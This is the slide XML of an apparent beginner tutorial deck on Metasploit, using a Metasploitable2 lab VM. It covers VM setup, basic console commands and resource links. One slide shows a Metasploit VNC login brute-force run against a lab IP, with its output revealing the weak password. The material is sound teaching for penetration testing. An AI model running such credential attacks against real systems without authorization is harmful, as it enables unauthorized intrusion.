                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 auxiliary(scanner/vnc/vnc_login) &gt; set rhost 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>rhost =&gt; 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 auxiliary(scanner/vnc/vnc_login) &gt; exploit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] 172.16.63.132:5900    - 172.16.63.132:5900 - Starting VNC login sweep</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[!] 172.16.63.132:5900    - No active DB -- Credential data will not be saved!</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[+] 172.16.63.132:5900    - 172.16.63.132:5900 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Login Successful: :password</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] 172.16.63.132:5900    - Scanned 1 of 1 hosts (100% complete)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] Auxiliary module execution completed</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 auxiliary(scanner/vnc/vnc_login) &gt; </a:t>
            </a:r>
            <a:endParaRPr sz="11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Breaking VNC - Did it work? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p2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password was: password </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="230" name="Google Shape;230;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131700" y="2210350"/>
            <a:ext cx="2268400" cy="2268400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4549803" y="1455800"/>
            <a:ext cx="3786600" cy="3134699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4515700" y="4523750"/>
            <a:ext cx="4049400" cy="44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Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>VNC Connection using MacOS default VNC client</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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Have Fun!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p2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Metasploitable2 image has a lot of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> services, and plenty of step by step tutorials you can find using the google machine.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i="1" lang="en"/>
              <a:t>Metasploitable 2</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t> too easy? Look at Metasploitable3!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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External Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p3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Exploitation Guide on Metasploitable2:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Comprehensive Guide on Metasploitable 2:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Too easy? Test your skills on Metasploitable3:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploitable3</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External Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p3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Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/searchsploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SANS Metasploit Cheat Sheet:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf</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Getting Started… things you need</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p14"/>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Kali Linux VM (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Kali Linux 64-Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CPU Cores: 2 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RAM: 2048MB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hard Disk: 20GB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure you put this box on it’s own private network!</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://kali.org/downloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p14"/>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Metasploitable 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  (Created by Metasploit) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CPU Cores: 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RAM: 2048MB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hard Disk: 20GB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure you put this box on it’s own private network!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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://bit.ly/2rgsfBI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   (Google Drive Link)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Metasploit - What is it? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;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“Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.” </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In theory the above statement is correct, however, it would be great if Metasploit worked that way. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unfortunately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>fortunately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, you need to dig into the services used, versions, correlate versions with CVEs, etc. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.csoonline.com/article/3379117/what-is-metasploit-and-how-to-use-this-popular-hacking-tool.html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Metasploit - Basic Commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;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t>Update your sh*t!</a:t>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pt update -y &amp;&amp; apt upgrade -y </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Accessing the console: </a:t>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enter the metasploit console by typing “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” into your terminal. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>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Metasploit - Basic Commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;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t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># search name:Windows type:exploit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
